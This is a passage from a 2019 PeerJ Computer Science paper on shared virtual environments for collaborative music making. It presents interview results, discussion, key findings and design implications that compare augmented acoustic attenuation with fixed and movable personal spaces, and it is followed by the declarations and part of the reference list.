chaotic. There were 34 coded segments contributed by 24 participants favouring condition Caug, higher than 12 segments contributed by 11 participants for Cpub, 10 segments contributed by eight participants for Cfix, and 19 segments contributed by 17 participants for Cmov (the sum of number of contributors here is greater than 52 as a few participants reported more than one favourite condition in the interview). The reason for the popularity can be concluded from the overwhelming 111 coded segments from 33 participants from 25 groups reporting the advantages of this condition, much higher than the number of segments reporting other conditions’ advantages. Caug’s advantages reported by participants can be grouped into four groups: (i) Higher team cohesion and less sense of separation. Participants reported that without the rigid personal space, they had to ‘‘work with the other person’’ (P6A). With no rigid personal space, Caug ‘‘forced [them] to collaborate more...because [they] had to stay very close’’ to compose music (P9B). (ii) An appropriate environment for creativity, more consistency and convenience. As described by participants, it was ‘‘a middle point between personal space and no personal space’’ (P6A), without even triggering something, ‘‘[they] could decide in a continuous way’’, ‘‘whether [they] were able to listen to the other sound sources or not, [and] to what extent [they] wanted to isolate [themselves]’’ (P16A). Compared with having to hear all sounds in Cpub, this provided them with a ‘‘less stressing’’ (P4A) context, and they could selectively move away to avoid ‘‘getting interrupted with the other’’ (P5B) and overlapping music. Compared with Cfix and Cmov, being able to still ‘‘hear a bit of it in the background but not completely’’ (P20A) was reported good as this kept them ‘‘up to date’’ (P9A) and helped them to ‘‘tailor what [he/she] was making’’ (P22B) to match the co-created music and to make something new and see if it ‘‘fit with’’ (P20A) the old. Caug provided them with ‘‘a little bit of personal space’’ although not a quite ‘‘defined thing’’ (P6A), which provided the possibility ‘‘to work on something individually’’ and to ‘‘share work quite easily’’ (P20A). (iii) Easier to identify sounds. Participants reported it was easier to ‘‘locate the source of the sound’’ (P16A) and ‘‘perceive what (they were) doing’’ (P15B), these factors then helped them ‘‘understand instruments better’’ (P7B) and ‘‘not get confused’’ (P15B); (iv) More real. Quite interestingly, instead of Cpub, which simulates the acoustic attenuation in the real world, Caug was reported to be similar to the experience in the real world. Participants reported in Caug ‘‘if [they] want to hear something, [they] just come closer, like in the real world’’ (P11B & P11B), ‘‘feeling like the real-time experience (P26B)’’. It should also be noted that, along with these 111 coded segments reporting the advantages provided by Caug, there are 19 segments reporting its limitations. These limitations fall into three groups: (i) a preference ‘‘to hear all the instruments all the time’’ in Cpub (P26B), (ii) Caug might lead to ‘‘another type of compositions’’ and ‘‘influence the piece’’ (P16B), and (iii) not being able to hear all sounds led to a feeling of separation (P18A). (3) Cfix and Cmov - resemblance and differences. Regardless of the mobility, the personal space provided by Cfix and Cmov share the same characteristics. Not surprisingly, the participants reported many common advantages and disadvantages shared by both conditions, including: The addition of rigid personal space was described as an ‘‘added advantage’’ (P7A), it made it ‘‘easier to perceive what [they were] doing and not get confused Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 27/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 with what [their collaborator] was doing’’ (P15B), provided them with a chance to ‘‘isolate themselves to create their piece’’ (P22A), and to ‘‘think about something to add’’ (P9A), helped them to ‘‘develop their own ideas’’ (P8A). As a result, they used personal space ‘‘a lot [and] used [their] own creativity much more comparing with [other two sessions]’’ (P3A & P3B). Common disadvantages reported include: The rigid form led to segmentation, and a feeling of being ‘‘forc[ed]’’ to work on something individually (P6A), making them ‘‘forget’’ the collaboration and collaborator (P8A & P12A), resulting in less collaboration, less ‘‘communication happening’’ (P7A), ‘‘lost the idea of the joint music piece’’ (P16A & P16B), and as a possible result, each other’s music pieces did not fit when brought up (P9A). P4A reported they were not familiar with music, and thus they ‘‘needed somebody to lead’’ them, so preferred to hear sounds all the time. Besides, P24B reported that the visual personal space made the stages look ‘‘messy’’. Differences between Cfix and Cmov—In total, 46 coded segments (from 26 participants) were reporting Cmov’s advantages and 26 segments (from 12 participants) reporting its disadvantages, compared with 22 segments (from 14 participants) and 56 segments (from 34 participants) for Cfix, indicating in general participants thought Cmov better than Cfix. Some example insights behind the preference are: Cmov functioned like a ‘‘mute button’’ (P4B), which could be used anywhere (P7B), enabling them to ‘‘move around’’, work ‘‘closer...and see each other’s things’’ and thus led to ‘‘more collaboration’’ between them (P1B). Though Cfix had no advantages on these aspects, the location at the opposite corners provided a more ‘‘personal feeling’’ and a higher sense of belonging (P22A & P22B). Walking to the corner to access personal space was not a big issue for P7B & P7A as ‘‘the boundary is small’’. Besides, the relatively far distance also helped to ‘‘prevent [them] from clashing’’ (P7A). DISCUSSION The key question that this paper tries to address is how shared virtual environments should be designed to support creative collaboration. To help answer this question, a better understanding of the role of personal and public space is needed given that previous research has highlighted the necessity of providing personal space with fluid transition to public space during collaboration (Scott, Carpendale & Inkpen, 2004; Shen, Everitt & Ryall, 2003; Sugimoto, Hosoi & Hashizume, 2004) and also that people do form public and personal space in collaboration in VEs (Men & Bryan-Kinns, 2019). Next, based on the results, we will discuss (i) the necessity and (ii) the impacts of adding each type of personal space, then make comparisons between (iii) conditions providing personal space with and without mobility, and iv) conditions providing personal space with rigid and fluid boundary. Necessity of adding personal space When no personal space was available, Cpub was reported to provide the experience of the least difficulty for tracking the collaborator (CQ3 in Table 2), the strongest sense of collaborator (CQ4), best communication quality (CQ5), the least difficulty to Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 28/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 cooperate (CQ9). So Cpub seems to be the simplest one among these four configurations for participants to learn and get used to. However, the issues of having no personal space are clear. Firstly, especially for the music making task in this study, according to the interview results, participants reported that the background could be messy to develop own ideas, their creativity requires a quieter and more controllable environment. Considering individual creativity forms an important part of the collaborative creativity, providing an appropriate environment is crucial. The personal space provided in Caug, Cfix, and Cmov functioned like a ‘‘less stressing’’ context, within which, participants could better ‘‘understand instruments’’ and not ‘‘get confused’’. Secondly, participants need an opportunity to develop their own ideas. From the interview results, having personal space was reported to be ‘‘an added advantage’’, it helped to promote their own creativity, which was then combined and contributed to the joint piece. This echoes the findings in Men & Bryan-Kinns, (2019), that providing personal spaces is helpful as it provides a chance to explore individual ideas freely, which then added an interesting dynamic to the collaborative work. Though some disadvantages of having personal space were also reported, e.g., less communication, higher isolation and being messy, most of these limitations were possibly the result of introducing rigid visible personal space, and Caug was founded to have addressed these limitations well (details will be discussed in later subsections). Next, we discuss the impacts of introducing each of these personal spaces individually by comparing their condition with Cpub. Impacts of adding personal space As mentioned above, the previous study (Men & Bryan-Kinns, 2019) found that the addition of personal space located at the opposite side of the public space led to a shrunken size of group territory, fewer group note edits, a larger size of personal territory, more personal note edits, a larger average distance between collaborators, and fewer times of paying attention to collaborators. We argued these negative impacts are mainly due to, in that study, the personal spaces being distributed on the opposite side of the group space resulted in a larger distance between participants. So we proposed personal space with different features (e.g., gradual boundary in Caug, mobility in Cmov) might reduce, or even minimise, these negative effects. Next, the impacts of introducing newly-featured personal spaces in Caug, Cfix, Cmov, and how these negative effects might be eliminated or minimised will be discussed. Invisible auditory personal space in Caug Caug is quite similar to Cpub in many ways, e.g., both do not have a visual boundary for personalspaces, no visualtriggers forpersonalspace, similar territorialpatterns wereformed in these two conditions (Fig. 8). Not surprisingly, no significant differences were found in most of the statistical measures listed in Tables 1 and 3. The only differences revealed in these two Tables are the significant differences found in AA16, AA17—significantly more occurrences and longer duration of close attention were paid to collaborator in Caug, and a marginal-significant difference in PSQ7—sense of collaborator’s activity is higher in Cpub than in Caug. From another perspective, fewer differences between Cpub and Caug Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 29/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 indicate that the limitations of adding personal space identified in previous work (Men & Bryan-Kinns, 2019) have been successfully minimised. Specifically, the size of group territory and the number of group edits maintained similar numbers, the means of Caug are even greater, though not significantly (AA5 and AA7 in Table 3). Cpub and Caug saw a similar size of personal territory and personal edits, and similar average distance (respectively, AA6, AA8, AA10 in Table 3), and Caug even saw more close-attention paid to each other (AA16 and AA17 in Table 3). All these similarities indicate that by introducing a personal space with gradual and invisible boundary, these identified disadvantages of introducing personal space have been successfully eliminated. Reasons can be that Caug managed to provide a similar interaction experience to Cpub. In the previous study (Men & Bryan-Kinns, 2019), to access the personal spaces located at the opposite side of the public space, participants had to drift apart, which might have influenced the their spatial locations, changed the formation of group/personal territory they formed and the average distance between collaborators changed, and territoriality-based interaction (group/personal edits) changed. Here in Caug, by enabling participants to use personal space anywhere inside the stage with no specific triggers needed, Caug managed to provide a user experience as similar as possible to Cpub. The second reason is more related to the impacts on subjective experience, by making the personal space invisible and gradual, the isolation and difficulty of coordinating that introduced by the additional rigid personal space was minimised. For instance, in the interview, participants reported Caug provided a proper level of group work as a working context, making easier to create new that matches the old. Movable personal space in Cmov In Cmov, participants could pop up the personal space anywhere in the stage. In this way, personal spaces was provided with mobility. By doing so, several aforementioned negative effects found in Men & Bryan-Kinns (2019) were reduced. Specifically, these include the size of group territory, the average distance, times of paying attention to collaborator (respectively, AA5, AA10, AA16, and AA17 in Table 3). However, some significant differences remained, participants still had significantly fewer mutual note modifications, marginal-significantly fewer group edits and significantly more personal edits after personal space being introduced in Cfix and Cmov (respectively, AA4, AA7, and AA8 in Table 3). This can also be verified by the interview results. Compared with Caug, participants reported a higher sense of isolation in Cmov and Cfix, both providing rigid-form personal spaces. Namely, Cmov, by making the personal space available anywhere in the stage, managed to drag participants closer, saw a similar group territory, however, participants’ behaviour was still affected in many ways. Participants were still separated to some extent, which can be seen as a disadvantage of adding visible, solid personal space. In other words, Cmov did better than Cfix in minimising the negative impacts of adding personal space, but not as good as Caug. A more rigid personal space in Cfix Cfix provided a much more inflexible personal space, which influenced participants’ behaviour in many ways (see the significant differences between Cpub and Cfix in Tables 1 and 3). Not to mention participants’ polarised ratings on Cpub and Cfix in CQ3, CQ4, Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 30/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 CQ5, CQ7 of Table 2: Significantly many participants reported the least difficulty of tracking collaborator’s activities (CQ3), the strongest sense of their collaborator’s presence (CQ4), the best communication quality (CQ5), the least difficulty of cooperating with collaborator (CQ7) happened in Cpub, whilst Cfix was thought conversely by significantly many participants. Their dislike of Cfix can also be seen in the interviews, in which the number of coded segments favouring Cfix and the number of segments reporting its advantages are the lowest, whist the number of segments disfavouring it and the number of segments reporting its disadvantages are the highest among the four conditions. Providing personal space with fluid boundary Measures in Table 3 show that Caug significantly differs from Cfix and Cmov in many ways. When both significant differences (p <0.05) and marginal-significant differences (p < 0.1) are considered, compared with Cfix and Cmov, Caug saw a smaller personal territory (AA6) and a bigger group territory (AA5), more mutual modifications (AA4), more group edits (AA7) and fewer personal edits (AA8), a larger distance between collaborators (AA10), more times of paying close attention (AA17) and a longer time of paying close attention (AA16). All these indicate that compared with the rigid personal space provided in Cfix and Cmov, the augmented acoustic attenuation in Caug enabled a closer collaboration, H3 is therefore supported. Caug’s advantages are shown in three ways, next, each will be specified. Enough support for creativity with minimal impacts PSQ2 (Table 1) questioned the support each condition gave to individual creativity. Although no significant differences were found, Caug has a higher mean rating, possibly indicating a higher level of support. It should be noted that all the questions in PSQ were phrased either positively (PSQ1, PSQ2, PSQ3, PSQ4, PSQ7) or neutrally (the rest), with no negative statements, which might have affected participants’ ratings positively. However, this imperfection has a limited influence on this study, because PSQ results are mostly used for comparisons between conditions, which are affected equally due to all of the conditions using the same phrasing. More insights regarding Caug’s helpfulness are revealed by the thematic analysis, according to which, Caug provided both ‘‘an appropriate background’’ with which participants felt ‘‘less stressed’’ and were able to ‘‘tailor’’ the individual composing to match the co-work, and a space personal enough to ‘‘work on something individually’’. No major differences were found between Cpub and Caug, indicating Caug provides a very mild solution, with limited impacts on people’s collaborative behaviour being introduced, whilst still providing sufficient support for individual creativity during collaboration. Thus H2 is validated. Closer collaboration and higher consistency According to measures of attention (AA16, AA17, AA18, AA19 in Table 3), compared with other conditions, in Caug participants paid more close attention to their collaborator. Possible reasons for this can be found from the thematic analysis and other measures of Activity Assessments (Table 3). Compared with realistic acoustic attenuation in Cpub, Caug’s augmented acoustic attenuation setting forced or prompted people to work closer in order to hear each other’s work, as reported by some participants. Compared with Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 31/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 adding personal space with visible rigid boundary, by enabling participants to ‘‘decide’’ whether to hear other’s work or not ‘‘in a continuous way’’, an invisible gradual boundary in Caug led to less separation, and higher consistency between personal and public space, which matches the finding that people would like to be able to smoothly shift their artifacts from personal to public with intermediate shades in-between (Greenberg, Boyle & LaBerge, 1999). Compared with rigid personal spaces in Cfix and Cmov, Caug saw more mutual note modifications, more group note edits, and larger group territory, a closer average distance between collaborators (respectively, AA4, AA7, AA5, and AA10 in Table 3), all of these indicate that Caug saw a less separated collaboration than Cfix and Cmov. Compared with the three levels of privacy provided in UbiTable (Shen, Everitt & Ryall, 2003) and the binary levels of privacy provided in SharedNote (Greenberg, Boyle & LaBerge, 1999), the step-less sonic privacy provided by Caug in this study possibly managed to better echo the suggestion that a boundary between personal and public space should be provided with gradations in subtle and lightweight ways to enable a fluid shift (Greenberg, Boyle & LaBerge, 1999), H3 is therefore supported. Popularity The code ‘‘advantage of Caug’’ has 111 coded segments, which is far more than the segments other codes have. Thirty-five coded segments are ‘‘most favourite—Caug’’, higher than all other three conditions. These indicate Caug is the most popular condition. This can also be partially verified by the preference measure. Specifically, Caug has the highest preference rating in PSQ3 (Table 1), and more participants chose Caug as the setting they most enjoyed in CQ1 (in Table 2). We believe the reasons behind this popularity are mainly due to its unique advantages, which as reported by participants, includes: (i) higher team cohesion and less sense of separation, (ii) an appropriate environment for creativity, (iii) easier to identify sounds and (iv) more real (though in fact, Cpub is more real from the perspective of simulation). These features of Caug made it provide better support for collaborative creativity and therefore led to its popularity. Providing personal space without/with mobility This subsection compares Cfix with Cmov. The clear, sole difference between these two conditions is the mobility of personal space. In Cfix, to access personal spaces at the corners, participants needed to physically walk away from the centre and head to the corner, which might be the reason that Cmov saw a closer average distance between collaborators than Cfix (AA10, Table 3). This greater distance in Cfix possibly resulted the significantly larger size of personal territories (AA6) and more personal edits (AA8) in Cfix. On the contrary, the closer distance in Cmov created more chances for participants to pay or draw attention between each other, as a result, significantly longer time was spent paying attention to collaborators (AA17, AA19 in Table 3). With a closer average distance and more attention paid to each other, participants reported they had a marginal-significantly better quality of communication in Cmov (PSQ6 of Table 1). On the other hand, with participants being far away from each other and less chances for contact in Cfix, significantly many participants reported that they had the worst communication quality in Cfix (CQ6, Table Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 32/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 2). Cmov was also rated by much fewer participants to be the least enjoyable condition than compared with Cfix (CQ1, Table 2). Besides, Cfix also led to a reduced sense of collaborator’s contribution (CQ9 in Table 3). As a possible result, Cmov saw a significantly more satisfying work output (PSQ5, Table 1). The thematic analysis results also echo these findings. More coded segments are reporting Cmov’s advantages compared with those reporting Cfix’s, with more coded segments reporting Cfix’s disadvantages than those reporting Cmov’s. Also, more coded segments are favouring Cmov compared those favouring Cfix. Participants reported being able to use personal space anywhere in the stage with the personal space was good as it resulted in a closer distance, which led to more collaboration and made it possible to see each other’s work. To conclude, compared with Cfix, Cmov resulted in a better communication quality, produced better feeling of collaborator’s contributions, and was rated more enjoyable, thus it saw a closer collaboration and produced a more satisfying result, H1 is therefore supported. Key Findings In summary, the following are key findings from our results: • Having personal space is suggested as it supports individual creativity, which is an important element of the collaborative creativity. • Caug minimised the negative impacts introduced by adding personal space (previously identified by Men & Bryan-Kinns, 2019) better than Cfix and Cmov. • Caug was found to have the most minimal impacts and even to influence the attention between collaborators positively. Both Cfix and Cmov produced a more alienated collaboration, indicators of which include significantly bigger personal territory and more personal edits, and significantly fewer mutual note modifications and fewer group edits, significantly lower sense of collaborator’s activity. Additionally, Cfix saw significantly more note edits, and significantly less ordinary attention paid between collaborators. • Providing personal space with a fluid boundary is preferable, it provides enough support for individual creativity with the minimal cost, and can even lead to a closer collaboration (specifically, greater attention was paid between collaborators). • Compared with stationary personal space, space with mobility led to better communication, produced a better feeling of collaborator’s contribution, had a higher rating in enjoyment, and produced a more satisfying output, and thus it supported collaboration better than stationary personal space. DESIGN IMPLICATIONS Based on the key points made above, we suggest five design implications for SVEs focusing on supporting creative collaboration (point 2 is for audio-related task only): (1) SVEs supporting creative collaboration tasks should come with personal space, as it provides essential support for the development of individual creativity, which forms a key part of the collaborative creativity. This is especially essential when the output of the Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 33/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 task is more disruptive (e.g., audio), co-workers need a space where they can think of and develop own mind and work. (2) For audio-related tasks (e.g., collaborative music making), manipulating acoustic attenuation as personal space is an effective way to support both individual creativity and collaboration. It allows users to shift between personal and public working space continuously by adjusting their relative distance. It comes with light-weight form, functions as a personal space well, and can increase close attention paid between participants. Besides, based on our finding, it does not introduce significantly negative impacts whereas rigid personal space does. (3) Beyond audio-related tasks, when providing personal space in SVEs, lightweight free-form personal space rather than personal space with rigid form should still be firstly considered, as it introduces fewer negative impacts on collaboration and enables a fluid shift, which matches the findings of Greenberg, Boyle & LaBerge (1999). The basis of providing light-weight privacy is not limited to audio, it can be provided by other modalitie(s) as well (e.g., visual). For example, in this study, augmented attenuation in sound has been verified to provide a useful personal space for CMM in SVEs. Similarly, a visual augmentation might be used for vision-related collaborative tasks (e.g., collaborative drawing) in SVEs. Multiple modalities can also be used simultaneously for tasks involving multiple modals, an example task can be making a short animation and creating an accompanying music track for it. (4) Manipulating the level of augmentation (e.g., the augmented acoustic attenuation in this study) can change the level of feeling personal. In the Caug condition of this study, participants adjusted their distance between themselves and collaborators to obtain a different level of being personal (herein referred as ‘‘personalness’’), e.g., total isolation can be achieved if both participants are working with a distance greater than 1.2 metres. We believe similarly, when personal spaces are provided with gradual and adjustable boundary, manipulating the parameter of the boundary (e.g., the degree of augmented attenuation) can impact the level of ‘‘personalness’’ and therefore adjust the impact of introducing personal space. For example, the augmented attenuation can be set to a very low level if an extremely minimal impact is being pursued. So adding a method enabling users to adjust the level can allow users to shift between having a ‘‘very personal’’ space with total isolation where they could not hear nor see each other’s work, and having no personal space when they have to work together. In this way, users can be enabled to manipulate the level between ‘‘personalness’’ and togetherness continuously, which is useful to allow users to develop own ideas and work together to tailor own work into the collaborative piece. Compared with adjusting ‘‘personalness’’ by distance in Caug, adjusting it by changing the parameter might also be useful as co-workers can then stay anywhere whilst still being able to adjust the ‘‘personalness’’ that the personal space provides. (5) When it is hard or impossible to design a gradual, light-weight personal space that applicable to the task due to the type of the task, and a rigid-form personal has to be considered, it is better to provide rigid personal space with mobility, as the mobility feature gives users more freedom for accessing the personal spaces, and produces a better user Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 34/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 experience with fewer negative impacts on the collaboration compared with rigid personal space without mobility. This implication also echoes the proposal raised in our previous work (Men & Bryan-Kinns, 2019). CONCLUSIONS In this article, we have briefed an experiment exploring how four different spatial configurations impact the collaboration differently. Both quantitative and qualitative data were demonstrated and analysed, comparisons between conditions were made, differences were found and five design implications were given. Specifically, augmented attenuation can support the individual creativity and the fluid shift between group activitiy and individual activity well during collaboration in SVE, with minimal negative impacts on collaboration introduced. We also found that a rigid personal space with mobility serves users’ needs better and is preferable over a non-mobile one. In the future, we are keen to explore how to design and apply personal spaces with fluid boundaries in a wider range of creative scenarios in SVEs, e.g., for collaborative drawing in an SVE, personal space (visual privacy) might be provided by creating a foggy environment, the more far away from the drawing objects are, the more blurry the collaborators perceive them. We are also interested in how the boundary might be manipulated and whether the manipulation can result in different impacts on the collaborative behaviour. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by EPSRC and AHRC Centre for Doctoral Training in Media and Arts Technology (EP/L01632X/1) and China Scholarship Council. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: EPSRC and AHRC Centre for Doctoral Training in Media and Arts Technology: EP/L01632X/1. China Scholarship Council. Competing Interests The authors declare there are no competing interests. Author Contributions • Liang Men conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft of the manuscript submitted for review and publication. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 35/39 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.229 • Nick Bryan-Kinns conceived and designed the experiments, authored or reviewed drafts of the paper, approved the final draft of the manuscript submitted for review and publication. • Louise Bryce authored or reviewed drafts of the paper, analyzed the data, approved the final draft of the manuscript submitted for review and publication. Ethics The following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): The Queen Mary Research Ethics Committee granted ethical approval to carry out the study within its facilities (Ethical Application Ref: QMREC2005). Data Availability The following information was supplied regarding data availability: The VR system of LeMo is available at: men, liang (2019): Unity Package for LeMo—A Multiplayer Music Making Prototype. figshare. Online resource. https: //doi.org/10.6084/m9.figshare.9816395.v1. Data is available at: Men, Liang (2019): Raw Data of Paper ‘‘Designing Virtual Spaces to Support Collaborative Creativity’’. figshare. Dataset. https://doi.org/10.6084/m9.figshare. 9820262.v1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.229#supplemental-information. REFERENCES Altman I. 1975. The environment and social behavior: privacy, personal space, territory, and crowding. Monterey: Brooks/Cole Pub. Co., Inc. Barbosa Á. 2003. Displaced soundscapes: a survey of network systems for music and sonic art creation. Leonardo Music Journal 13:53–59 DOI 10.1162/096112104322750791. Basdogan C, Ho C-H, Srinivasan MA, Slater M. 2000. An experimental study on the role of touch in shared virtual environments. ACM Transactions on Computer-Human Interaction 7(4):443–460 DOI 10.1145/365058.365082. Benford S, Greenhalgh C, Rodden T., Pycock J. 2001. Collaborative virtual environ- ments. Communications of the ACM 44(7):79–85. Billinghurst M, Kato H. 2002. Collaborative augmented reality. Communications of the ACM 45(7):64–70. Billinghurst M, Poupyrev I, Kato H, May R. 2000. Mixing realities in shared space: An augmented reality interface for collaborative computing. In: 2000 IEEE international conference on multimedia and expo. ICME2000. Proceedings. Latest advances in the fast changing world of multimedia (Cat. No. 00TH8532). Piscataway: IEEE, 1641–1644 DOI 10.1109/ICME.2000.871085. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 36/39 https://peerj.com https://doi.org/10.6084/m9.figshare.9816395.v1 https://doi.org/10.6084/m9.figshare.9816395.v1 https://doi.org/10.6084/m9.figshare.9820262.v1 https://doi.org/10.6084/m9.figshare.9820262.v1 http://dx.doi.org/10.7717/peerj-cs.229#supplemental-information http://dx.doi.org/10.7717/peerj-cs.229#supplemental-information http://dx.doi.org/10.1162/096112104322750791 http://dx.doi.org/10.1145/365058.365082 http://dx.doi.org/10.1109/ICME.2000.871085 http://dx.doi.org/10.7717/peerj-cs.229 Bishop G, Fuchs H. 1992. Research directions in virtual environments: report of an NSF Invitational Workshop, March 23–24, 1992, University of North Car- olina at Chapel Hill. ACM SIGGRAPH Computer Graphics 26(3):153–177 DOI 10.1145/142413.142416. Blaine T, Fels S. 2003. Contexts of collaborative musical experiences. In: Proceedings of the 2003 conference on new interfaces for musical expression (NIME). National University of Singapore, 129–134. Braun V, Clarke V. 2006. Using thematic analysis in psychology. Qualitative Research in Psychology 3(2):77–101 DOI 10.1191/1478088706qp063oa. Bressan F, Vets T, Leman M. 2017. A multimodal interactive installation for collabora- tive music making: from preservation to enhanced user design. In: Proceedings of the European society for cognitive sciences of music (ESCOM) conference, Ghent University. 23–26. Bryan-Kinns N. 2004. Daisyphone: the design and impact of a novel environment for remote group music improvisation. In: Proceedings of the 5th conference on designing interactive systems: processes, practices, methods, and techniques. ACM, 135–144. Bryan-Kinns N. 2013. Mutual engagement and collocation with shared repre- sentations. International Journal of Human-Computer Studies 71(1):76–90 DOI 10.1016/j.ijhcs.2012.02.004. Bryan-Kinns N, Hamilton F. 2012. Identifying mutual engagement. Behaviour & Information Technology 31(2):101–125 DOI 10.1080/01449290903377103. Bryan-Kinns N, Healey PG, Leach J. 2007. Exploring mutual engagement in creative collaborations. In: Proceedings of the 6th ACM SIGCHI conference on creativity & cognition. New York: ACM, 223–232. Carlsson C, Hagsand O. 1993. DIVE A multi-user virtual reality system. In: Proceedings of IEEE virtual reality annual international symposium. Piscataway: IEEE, 394–400. Case DA, Ploog BO, Fantino E. 1990. Observing behavior in a computer game. Journal of the Experimental Analysis of Behavior 54(3):185–199 DOI 10.1901/jeab.1990.54-185. Fencott R, Bryan-Kinns N. 2010. Hey man, you’re invading my personal space! privacy and awareness in collaborative music. In: Proceedings of the 2010 conference on new interfaces for musical expression (NIME). Available at http://www.eecs.qmul.ac.uk/ ~nickbk/papers/P198_Fencott.pdf . Gaver WW. 1992. The affordances of media spaces for collaboration. In: Proceedings of the 1992 ACM conference on computer-supported cooperative work. ACM, 17–24. Greenberg S, Boyle M, LaBerge J. 1999. PDAs and shared public displays: Making personal information public, and public information personal. Personal Technologies 3(1–2):54–64 DOI 10.1007/BF01305320. Hall ET. 1966. The hidden dimension. Vol. 609. Garden City: Doubleday. Hendrix C, Barfield W. 1996. The sense of presence within auditory virtual en- vironments. Presence: Teleoperators & Virtual Environments 5(3):290–301 DOI 10.1162/pres.1996.5.3.290. Kreijns K, Kirschner PA, Jochems W. 2003. Identifying the pitfalls for social interaction in computer-supported collaborative learning environments: a review of the Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 37/39 https://peerj.com http://dx.doi.org/10.1145/142413.142416 http://dx.doi.org/10.1191/1478088706qp063oa http://dx.doi.org/10.1016/j.ijhcs.2012.02.004 http://dx.doi.org/10.1080/01449290903377103 http://dx.doi.org/10.1901/jeab.1990.54-185 http://www.eecs.qmul.ac.uk/~nickbk/papers/P198_Fencott.pdf http://www.eecs.qmul.ac.uk/~nickbk/papers/P198_Fencott.pdf http://dx.doi.org/10.1007/BF01305320 http://dx.doi.org/10.1162/pres.1996.5.3.290 http://dx.doi.org/10.7717/peerj-cs.229 research. Computers in Human Behavior 19(3):335–353 DOI 10.1016/S0747-5632(02)00057-2. Kruger R, Carpendale S, Scott SD, Greenberg S. 2004. Roles of orientation in tabletop collaboration: comprehension, coordination and communication. Computer Supported Cooperative Work 13(5–6):501–537 DOI 10.1007/s10606-004-5062-8. Lea R, Honda Y, Matsuda K. 1997. Virtual society: collaboration in 3D spaces on the internet. Computer Supported Cooperative Work 6(2):227–250 DOI 10.1023/A:1008672915465. Luciani A. 2007. Virtual reality and virtual environment. In: Enaction and enactive interfaces: a handbook of terms. Grenoble: Enactive Systems Book ACROE, 299–300. Men L, Bryan-Kinns N. 2018. LeMo: supporting collaborative music making in virtual reality. In: 2018 IEEE 4th VR workshop on sonic interactions for virtual environments (SIVE). Piscataway: IEEE, 1–6 DOI 10.1109/SIVE.2018.8577094. Men L, Bryan-Kinns N. 2019. LeMo: exploring virtual space for collaborative creativity. In: Proceedings of the 2019 on creativity and cognition, C&C ’19. New York: ACM, 71–82 DOI 10.1145/3325480.3325495. Men L, Bryan-Kinns N, Hassard AS, Ma Z. 2017. The impact of transitions on user experience in virtual reality. In: 2017 IEEE virtual reality (VR). 285–286 DOI 10.1109/VR.2017.7892288. Nassiri N, Powell N, Moore D. 2010. Human interactions and personal space in collaborative virtual environments. Virtual Reality 14(4):229–240 DOI 10.1007/s10055-010-0169-3. Nedel L, De Souza VC, Menin A, Sebben L, Oliveira J, Faria F, Maciel A. 2016. Using immersive virtual reality to reduce work accidents in developing countries. IEEE Computer Graphics and Applications 36(2):36–46. Pinelle D, Gutwin C, Greenberg S. 2003. Task analysis for groupware usability evaluation: modeling shared-workspace tasks with the mechanics of collab- oration. ACM Transactions on Computer-Human Interaction 10(4):281–311 DOI 10.1145/966930.966932. Raffestin C. 2012. Space, territory, and territoriality. Environment and Planning D: Society and Space 30(1):121–141 DOI 10.1068/d21311. Rodden T. 1991. A survey of CSCW systems. Interacting with Computers 3(3):319–353 DOI 10.1016/0953-5438(91)90020-3. Roussos M, Johnson AE, Leigh J, Vasilakis CA, Barnes CR, Moher TG. 1997. NICE: combining constructionism, narrative and collaboration in a vir- tual learning environment. ACM SIGGRAPH Computer Graphics 31:62–63 DOI 10.1145/262171.262264. Sack RD. 1983. Human territoriality: a theory. Annals of the Association of American Geographers 73(1):55–74 DOI 10.1111/j.1467-8306.1983.tb01396.x. Schroeder R. 2002. Social interaction in virtual environments: key issues, common themes, and a framework for research. In: The social life of Avatars: presence and interaction in shared virtual environments. Berlin, Heidelberg: Springer-Verlag, 1–18. Men et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.229 38/39 https://peerj.com http://dx.doi.org/10.1016/S0747-5632(02)00057-2 http://dx.doi.org/10.1007/s10606-004-5062-8 http://dx.doi.org/10.1023/A:1008672915465 http://dx.doi.org/10.1109/SIVE.2018.8577094 http://dx.doi.org/10.1145/3325480.3325495 http://dx.doi.org/10.1109/VR.2017.7892288 http://dx.doi.org/10.1007/s10055-010-0169-3 http://dx.doi.org/10.1145/966930.966932 http://dx.doi.org/10.1068/d21311 http://dx.doi.org/10.1016/0953-5438(91)90020-3 http://dx.doi.org/10.1145/262171.262264 http://dx.doi.org/10.1111/j.1467-8306.1983.tb01396.x http://dx.doi.org/10.7717/peerj-cs.229 Schubert T, Friedmann F, Regenbrecht H. 2001. The experience of presence: factor analytic insights. Presence: Teleoperators & Virtual Environments 10(3):266–281 DOI 10.1162/105474601300343603. Scott SD, Carpendale S. 2010. Theory of tabletop territoriality. In: Tabletops-horizontal interactive displays. London: Springer, 